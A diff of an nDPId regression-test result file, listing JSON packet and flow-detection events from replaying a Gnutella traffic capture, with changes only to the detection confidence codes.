00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":918,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":2,"flow_last_seen":90787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90787,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA2cAAEAGHo9QB\/zACgACDxroxIoAs7ABAD7ueWAS\/\/\/AYAAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":919,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":3,"flow_last_seen":90787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90787,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoIw9AAIAGfuoKAAIPUAf8wMSKGugAPu55ALOwAlAQ+vDdLAAA"} -01138{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":920,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":90787,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"6992dc627532d4fbccd43fb03d3bdeb4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01138{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":920,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":90787,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"6992dc627532d4fbccd43fb03d3bdeb4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":930,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":2,"flow_last_seen":90795,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90795,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA24AAEAGymQugHJrCgACDxmyxHoAtKoBziHWF2AS\/\/++AAAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":3,"flow_last_seen":90796,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90796,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoDztAAIAGPpsKAAIPLoBya8R6GbLOIdYXALSqAlAQ+vDazAAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":2,"flow_last_seen":90799,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90799,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA3IAAEAGvK6khAoZCgACD9gGxJIAtaQBToGf\/mAS\/\/+tmgAAAgQFtA=="} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":3,"flow_last_seen":90799,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90799,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoptFAAIAGmVIKAAIPpIQKGcSS2AZOgZ\/+ALWkAlAQ+vDKZgAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":90799,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90799,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":50298,"dst_port":6578,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90800,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90800,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":90799,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90799,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":50298,"dst_port":6578,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90800,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90800,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":2,"flow_last_seen":90800,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90800,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA3YAAEAGCtCwY7AUCgACDxjKxIMAtp4BeVRy4GAS\/\/\/DVQAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":3,"flow_last_seen":90801,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90801,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoGLRAAIAGdZUKAAIPsGOwFMSDGMp5VHLgALaeAlAQ+vDgIQAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":948,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90801,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90801,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":948,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90801,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90801,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90809,"flow_last_seen":90809,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90809,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":90809,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90809,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4BlIAAIAREmwKAAIPaO6s+nAJW\/wAJA6KHB0xAtgN+vD\/0M\/t\/ONIAwABAAUAAADDglFLQA=="} 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":986,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":2,"flow_last_seen":90840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":90840,"pkt":"CAAn5uVZUlQAEjUCCABFAACBA44AAEARVOdo7qz6CgACD1v8cAkAbdSrHB0xAtgN+vD\/0M\/t\/ONIAwEBAE4AAAD8W2jurPoAAAAACAAAAMMCVkNFR1RLR2IDR1VFQQICVVBDAgEGAkRVQl9jATZQIAEZ8HQAiAgAAAAAAAEAAQNESFRDAAABglFLRIDlHEU="} @@ -955,8 +955,8 @@ 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":3,"flow_last_seen":90843,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90843,"pkt":"UlQAEjUCCAAn5uVZCABFAAAopBpAAIAGrC4KAAIPJo536sR3wkQjIZHCALeYAlAQ+vA2AwAA"} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90845,"flow_last_seen":90845,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90845,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":28681,"dst_port":11852,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":90845,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90845,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4c0wAAIARymUKAAIPvD00t3AJLkwAJK1JGu4xAkJx0f\/\/24\/JSJ6wAwABAAUAAADDglFLQA=="} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1005,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90740,"flow_last_seen":90850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90850,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":50295,"dst_port":49732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -01553{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1011,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90746,"flow_last_seen":90857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1724,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":90857,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"6992dc627532d4fbccd43fb03d3bdeb4","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=gtk-gnutella\/1.2.1","subjectDN":"CN=gtk-gnutella\/1.2.1","fingerprint":"E8:DD:F0:B2:FF:8C:27:5A:12:75:D4:AE:60:1B:D9:87:E8:FF:45:93"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1005,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90740,"flow_last_seen":90850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90850,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":50295,"dst_port":49732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +01553{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1011,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90746,"flow_last_seen":90857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1724,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":90857,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"6992dc627532d4fbccd43fb03d3bdeb4","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=gtk-gnutella\/1.2.1","subjectDN":"CN=gtk-gnutella\/1.2.1","fingerprint":"E8:DD:F0:B2:FF:8C:27:5A:12:75:D4:AE:60:1B:D9:87:E8:FF:45:93"}} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":2,"flow_last_seen":90857,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":90857,"pkt":"CAAn5uVZUlQAEjUCCABFAAB0A6AAAEAReda8PTS3CgACDy5McAkAYD84Gu4xAkJx0f\/\/24\/JSJ6wAwEBAEEAAABMLrw9NLcAAAAACAAAAMMCVkNFR1RLR1cDR1VFQQICVVBDAgEHAkRVQ4BRAQNUTFNAA0RIVEMAAAGCUUtE7kD0pA=="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1026,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90864,"flow_last_seen":90864,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90864,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":28681,"dst_port":53489,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":90864,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90864,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4OIoAAIAR8bMKAAIPubtKrXAJ0PEAJMQW\/3wxAm1gREr\/fw\/7dxmzAwABAAUAAADDglFLQA=="} @@ -964,42 +964,42 @@ 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":90871,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90871,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4xlIAAIARNMIKAAIPjoSlDXAJd2YAJJzV5\/IxAvsVo43\/HfOSkBgzAwABAAUAAADDglFLQA=="} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":2,"flow_last_seen":90872,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90872,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA6gAAEAGqm3BJf+CCgACD\/CwxIQAuJIBv98bx2AS\/\/+nyQAAAgQFtA=="} 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":3,"flow_last_seen":90872,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90872,"pkt":"UlQAEjUCCAAn5uVZCABFAAAogopAAIAGq44KAAIPwSX\/gsSE8LC\/3xvHALiSAlAQ+vDElQAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90873,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90873,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90873,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90873,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1036,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90880,"flow_last_seen":90880,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90880,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":28681,"dst_port":59596,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1036,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":90880,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90880,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4YpYAAIARjBkKAAIPwSB+1nAJ6MwAJJ5bn1UxAqnqa\/T\/ZYYW3VylAwABAAUAAADDglFLQA=="} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1037,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":90882,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90882,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA6sAAEAGxg9gQUTCCgACD4qZxIkAuYwBsqFtYmAS\/\/\/rIgAAAgQFtA=="} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1038,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":90882,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90882,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoBGJAAIAGRVwKAAIPYEFEwsSJipmyoW1iALmMAlAQ+vAH7wAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1039,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90883,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90883,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1039,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90883,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90883,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 